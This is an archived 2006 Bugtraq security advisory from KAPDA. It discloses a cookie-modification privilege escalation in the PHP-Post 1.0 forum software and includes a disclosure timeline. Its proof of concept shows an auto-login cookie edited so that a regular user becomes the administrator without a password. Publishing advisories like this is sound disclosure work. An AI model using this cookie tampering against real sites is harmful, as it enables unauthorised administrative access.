lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 18 Jul 2006 14:06:03 -0000
From: farhadkey@...da.ir
To: bugtraq@...urityfocus.com
Subject: [KAPDA::#52] - PHP-Post 1.0 Cookie Modification Privilege
 Escalation Vulnerability

[KAPDA::#52] - PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability

KAPDA New advisory

Vulnerable product: Tested on PHP-Post 0.21 and 1.0
Vendor: http://php-post.co.uk
Vulnerability: Privilege Escalation

Date:
--------------------
Found: Nov 23, 2005
Vendor Contacted: Jun 01, 2006
Release Date: July 18, 2006

About PHP-Post:
--------------------
Free, full featured php+mysql Forum Management System.

Vulnerability:
--------------------
Privilege Escalation:
PHP-Post contains a flaw that may allow a remote attacker to gain administrative privileges.
PHP-Post doesn't properly authenticate remote users if auto login is on!
By editing the values of the cookie, an attacker can change their privilege from a regular user to administrator and submit it back to the site.

Proof of Concepts:
--------------------
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

change to:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

refresh the site, go to the admin`s panel without password ;)

Solution:
--------------------
No special patch is yet released by vendor but the vendor's website was patched!

Jun 01, 2006: vendor contacted
Jun 03, 2006: vendor replied
* July 18, 2006: public release

Original Advisory:
--------------------
http://www.kapda.ir/advisory-380.html

Credit:
--------------------
FarhadKey of KAPDA
farhadkey [at} kapda <d0t> net
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ